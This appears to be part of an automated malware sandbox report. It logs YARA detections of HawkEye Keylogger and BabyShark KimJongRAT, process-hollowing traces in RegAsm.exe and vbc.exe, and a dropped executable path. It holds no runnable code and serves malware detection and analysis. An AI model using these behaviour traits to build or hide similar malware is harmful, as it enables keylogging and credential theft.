Source: 1.2.RegAsm.exe.53b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055AACC8 NtUnmapViewOfSection,NtUnmapViewOfSection,	1_2_055AACC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	2_2_0040978A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EFA750 NtUnmapViewOfSection,NtUnmapViewOfSection,	5_2_04EFA750
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	6_2_0040978A

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3E86F	0_2_00A3E86F
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3ADEE	0_2_00A3ADEE
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4D125	0_2_00A4D125
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A33107	0_2_00A33107
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3A940	0_2_00A3A940
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7518	1_2_055A7518
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A1D2E	1_2_055A1D2E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055AA1E2	1_2_055AA1E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A4998	1_2_055A4998
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A5588	1_2_055A5588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A0801	1_2_055A0801
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A34D0	1_2_055A34D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7F10	1_2_055A7F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A8B90	1_2_055A8B90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7A11	1_2_055A7A11
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7508	1_2_055A7508
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A6D30	1_2_055A6D30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A41D8	1_2_055A41D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A41CA	1_2_055A41CA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A45C0	1_2_055A45C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A3DF2	1_2_055A3DF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A45B2	1_2_055A45B2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A4DB0	1_2_055A4DB0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A4DA1	1_2_055A4DA1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A0816	1_2_055A0816
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A3C00	1_2_055A3C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A8439	1_2_055A8439
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A5890	1_2_055A5890
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A5880	1_2_055A5880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A08B0	1_2_055A08B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A5768	1_2_055A5768
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A2730	1_2_055A2730
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A2721	1_2_055A2721
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A3BC1	1_2_055A3BC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A8B80	1_2_055A8B80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A3218	1_2_055A3218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A3E00	1_2_055A3E00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A6A22	1_2_055A6A22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7A20	1_2_055A7A20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_055A7EC1	1_2_055A7EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0044900F	2_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_004042EB	2_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00414281	2_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00410291	2_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_004063BB	2_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00415624	2_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0041668D	2_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0040477F	2_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0040487C	2_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0043589B	2_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0043BA9D	2_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0043FBD3	2_2_0043FBD3
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015E86F	4_2_0015E86F
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_00153107	4_2_00153107
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016D125	4_2_0016D125
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015A940	4_2_0015A940
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015ADEE	4_2_0015ADEE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_027E2477	5_2_027E2477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF66D2	5_2_04EF66D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF5890	5_2_04EF5890
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF9C68	5_2_04EF9C68
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1442	5_2_04EF1442
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF8618	5_2_04EF8618
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7A11	5_2_04EF7A11
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF13BB	5_2_04EF13BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF4DB0	5_2_04EF4DB0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF5588	5_2_04EF5588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3398	5_2_04EF3398
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF4998	5_2_04EF4998
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF0D70	5_2_04EF0D70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7518	5_2_04EF7518
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7F10	5_2_04EF7F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7EC1	5_2_04EF7EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF08AC	5_2_04EF08AC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF38B7	5_2_04EF38B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3AB4	5_2_04EF3AB4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF188B	5_2_04EF188B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF388B	5_2_04EF388B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF5880	5_2_04EF5880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF369C	5_2_04EF369C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3868	5_2_04EF3868
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1A66	5_2_04EF1A66
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3A77	5_2_04EF3A77
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1671	5_2_04EF1671
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3671	5_2_04EF3671
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1846	5_2_04EF1846
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF6A22	5_2_04EF6A22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7A20	5_2_04EF7A20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3A3A	5_2_04EF3A3A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF8608	5_2_04EF8608
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3C00	5_2_04EF3C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3E00	5_2_04EF3E00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF361B	5_2_04EF361B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3218	5_2_04EF3218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7A14	5_2_04EF7A14
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF37FA	5_2_04EF37FA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3DF2	5_2_04EF3DF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF41C9	5_2_04EF41C9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF19C2	5_2_04EF19C2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF45C0	5_2_04EF45C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF39DA	5_2_04EF39DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF41D8	5_2_04EF41D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF4DAB	5_2_04EF4DAB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF37B8	5_2_04EF37B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF45B1	5_2_04EF45B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1B8F	5_2_04EF1B8F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3389	5_2_04EF3389
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF4989	5_2_04EF4989
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3580	5_2_04EF3580
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF5768	5_2_04EF5768
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1D7F	5_2_04EF1D7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1977	5_2_04EF1977
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3777	5_2_04EF3777
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1576	5_2_04EF1576
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1D70	5_2_04EF1D70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3744	5_2_04EF3744
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF1940	5_2_04EF1940
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF2721	5_2_04EF2721
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF2730	5_2_04EF2730
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF6D30	5_2_04EF6D30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3B0F	5_2_04EF3B0F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF390D	5_2_04EF390D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF750B	5_2_04EF750B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7F05	5_2_04EF7F05
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF2F00	5_2_04EF2F00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF7513	5_2_04EF7513
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_04EF3711	5_2_04EF3711
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0044900F	6_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004042EB	6_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00414281	6_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00410291	6_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004063BB	6_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00415624	6_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0041668D	6_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040477F	6_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040487C	6_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0043589B	6_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0043BA9D	6_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0043FBD3	6_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00404DE5	13_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00404E56	13_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00404EC7	13_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_00404F58	13_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_0040BF6B	13_2_0040BF6B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 0044465C appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 0044466E appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00415F19 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 0044468C appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004162C2 appears 174 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00412084 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00444B90 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 0041607A appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 0042F6EF appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004083D6 appears 64 times

Source: b15023b1855da1cf5213b061dc626cc2.exe	Binary or memory string: OriginalFilename vs b15023b1855da1cf5213b061dc626cc2.exe
Source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000003.348776345.000000003296F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs b15023b1855da1cf5213b061dc626cc2.exe
Source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000002.370230188.0000000032700000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSkivvies.exe* vs b15023b1855da1cf5213b061dc626cc2.exe
Source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameReborn Stub.exe" vs b15023b1855da1cf5213b061dc626cc2.exe
Source: b15023b1855da1cf5213b061dc626cc2.exe	Binary or memory string: OriginalFilenameSkivvies.exe* vs b15023b1855da1cf5213b061dc626cc2.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior

Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: xjyxibeifbdmock.exe PID: 6828, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432, type: MEMORY	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
